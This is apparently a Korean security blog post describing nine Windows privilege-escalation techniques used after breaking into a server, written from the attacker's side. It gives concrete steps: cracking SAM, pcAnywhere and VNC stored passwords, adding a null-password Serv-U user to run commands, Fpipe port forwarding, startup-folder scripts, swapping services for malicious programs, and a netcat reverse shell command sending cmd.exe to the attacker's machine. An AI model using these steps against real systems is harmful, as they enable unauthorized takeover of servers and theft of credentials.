시스템보안(지식창고)

시스템 권한 해킹 기법

컴공 2013. 3. 7. 14:29
반응형

안녕하세요.

문보안관 입니다.

해커가 만약 침투할 컴퓨터에 침입을 성공하였더라도 그 컴퓨터에 대한 권한이 없다면 마음대로 해킹 할 수 없다.

그만큼 목표 컴퓨터의 권한을 획득한다는 것은 침입을 성공하는 것만큼 중요한 작업이다.

본 자료는 해커가 침입을 성공한 후 권한을 상승하는 기법에 대해 9가지로 정리하여 설명하고 있다.

1. RAdmin 을 이용한 권한 상승

Radmin ( 기본 포트 : 4899 ) 은 자신의 컴퓨터에서 원격 컴퓨터를 제어하는 프로그램 으로서 파일 전송, NT 보안, 텔넷 등의 주요한

기능을 원격에서 사용할 수 있다.

침투할 서버에 대한 약간의 권한이 존재하고 방화벽이 존재하지 않는다면 Radmin 서버를 압축하고 업로드 한 다음 실행하고 클라이언트로

접속을 한다.

 

[Radmin]

2. pcAnywhere 을 이용한 권한 상승

pcAnywhere ( 기본 포트 : 5631/5632 ) 는 Symatec에서 제작한 원격 제어 프로그램으로서 RAdmin

과 마찬가지로 원격에서 여러가지 기능을 사용할 수 있도록 제공하고 있다.

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 이 폴더에 저장되어 있는 cif 파일을

다운 받아 패스워드 크랙한 다음 접속 한다.

 

                                                                                           [ pcAnywhere ]

 

3. SAM 파일 크랙을 통한 권한 상승

SAM ( Security Account Manager ) 파일은 C:\WINNT\system32\config\ 에 위치하며, 사용자 / 그롭 계정 정보에 대한 데이터베이스를

관리 한다. 사용자의 로그인 입력 정보와 SAM 데이터베이스 정보를 비교하여 인증 여부를 결정하도록 해주는 것이다.

목표 서버에 SAM 파일을 다운받아 크랙하여 사용자 ID/PW 정보를 획득하여 관리자 권한을 상승 할 수 있다.

 

                                                                                           [ SAM 파일 크랙 화면 ]

4. Serv-U 을 이용한 권한 상승

SerV - U 은 자신의 컴퓨터를 FTP 서버로 만들어 주는 프로그램으로 WFTPD 와 함께 가장 유명하고 넓은 인지도를 확보하고 있는 프로그램이다.

 

                                                                                                   [ Serv-U 를 실행한 화면 ]

목표 서버의 C:\Documents and Settings\All Users\시작 메뉴\프로그램\ 에서 Serv-U의 경로를 알아낸 다음 그 폴더로 이동하여

ServUDaemon.ini 를 수정할 수 있는지 확인한다.

만약 수정이 가능하면 사용자 한 명을 추가한 뒤 패스워드는 Null 로 설정 한다.

ServUDaemon.ini

 

그리고 FTP로 접속을 하여 명령어 quoto site exec [cmd] 로 권한 상승 한다.

다른 방법으로 침투 서버에 설치된 servudaemon.ini 파일을 다운받은 후 자신의 컴퓨터에 serv-U를 설치하여 덮어쓰기를 하면

모든 설정이 목표 서버의 설정과 동일하게 된다.

또 다른 방법으로는 Serv-U 로컬 포트를 이용하는 것이다. Serv-U 로컬관리 포트는 43958포트이다.

Fpipe.exe 를 업로드 하여 아래와 같은 명령을 실행 한다.

Fpipe -v -l 3333 -r 43958 127.0.0.1

5. CScript 실행

cscript c:\inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 명령어는 권한이 있어야 볼 수 있는 dll 파일을 볼 수 있다.

그리고 asp.dll 파일을 이 그룹에 추가한다.

asp.dll 파일은 c:\winnt\system32\inetsrv\ 에 위치하여 있다.

부동한 서버에 저장된 위치도 다를 수도 있지만, 추가하는 방법은 다음과 같다.

 

cscript adsutil.vbs get /W3SVC/InProcesslsapiApps 명령어로 추가되었는지 살펴볼 수 있다.

6. 스크립트 파일을 이용한 권한 상승

"c:\Documents and Settings\All Users\시작메뉴\프로그램\시작프로그램"에 bat,vbs 파일을 추가한다.

7. Vnc 을 이용한 권한 상승

Vnc ( 기본 포트 : 5800 ) 역시 pcAnywhere 나  RAdmin 처럼 원격 제어 프로그램 이다.

Vnc 패스워드는 디폴트로 HKCU\Software\ORL\WinVNC3\Password 에 위치하여 있다.

이는 vncx4 로 크랙할 수 있다.

Vncx4의 사용법은 아주 간단하다.

cmd 모드에서 아래와 같이 입력 한다

c:\vncx4 -W

그리고 순서적으로 16진수를 입력하면 된다.

8. nc업그레이드

침투 서버에nc 를 실행하여 리버스커넥션으로 자신의 컴퓨터로 연결한다.

하지만 이는 일정한 권한이 있어야 가능하다.

<사용 예제>

해커컴퓨터 : nc.exe -l -p 80

침투컴퓨터 : nc.exe -e cmd.exe 192.168.0.9 80

9. 서비스 변경

윈도우 OS 에 설치되어 있는 기본 서비스를 악의적 프로그램으로 바꿔놓고 서버를 재부팅 시킨다.

이상 침투 후 권한 상승에 대한 정보를 살펴 보았습니다.

담엔 더 알찬 자료로 다가오겠습니다.

좋은 하루요~~

반응형